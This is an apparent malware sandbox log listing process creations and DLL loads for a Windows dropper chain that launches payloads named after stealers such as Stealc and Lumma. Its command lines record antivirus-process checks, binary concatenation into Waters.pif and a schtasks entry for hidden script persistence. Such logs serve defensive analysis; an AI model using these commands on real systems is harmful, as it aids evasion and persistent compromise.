Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe "C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\u3uP67496d.exe "C:\Users\user\AppData\Roaming\u3uP67496d.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe "C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe"
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Process created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe "C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe "C:\Users\user\AppData\Local\Temp\1000254001\penis.exe"
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe "C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe"
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Process created: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe "C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe"
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000285001\2.exe "C:\Users\user\AppData\Local\Temp\1000285001\2.exe"
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe "C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe"
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe "C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe"
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe "C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 607698
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MaskBathroomCompositionInjection" Participants
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Navy + ..\Temperature + ..\Streaming + ..\Ashley + ..\Ensures + ..\Language + ..\Viruses + ..\Bet + ..\Fla + ..\Asbestos + ..\Width Q
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\607698\Waters.pif Waters.pif Q
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\607698\Waters.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\user\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user\AppData\Local\Temp\1000002001\gold.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe "C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe "C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe "C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe "C:\Users\user\AppData\Local\Temp\1000254001\penis.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe "C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000285001\2.exe "C:\Users\user\AppData\Local\Temp\1000285001\2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe "C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe "C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe "C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe "C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\u3uP67496d.exe "C:\Users\user\AppData\Roaming\u3uP67496d.exe"
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Process created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Process created: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe "C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe"
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 607698
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MaskBathroomCompositionInjection" Participants
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Navy + ..\Temperature + ..\Streaming + ..\Ashley + ..\Ensures + ..\Language + ..\Viruses + ..\Bet + ..\Fla + ..\Asbestos + ..\Width Q
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\607698\Waters.pif Waters.pif Q
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\607698\Waters.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\user\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\607698\Waters.pif	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: esdsip.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
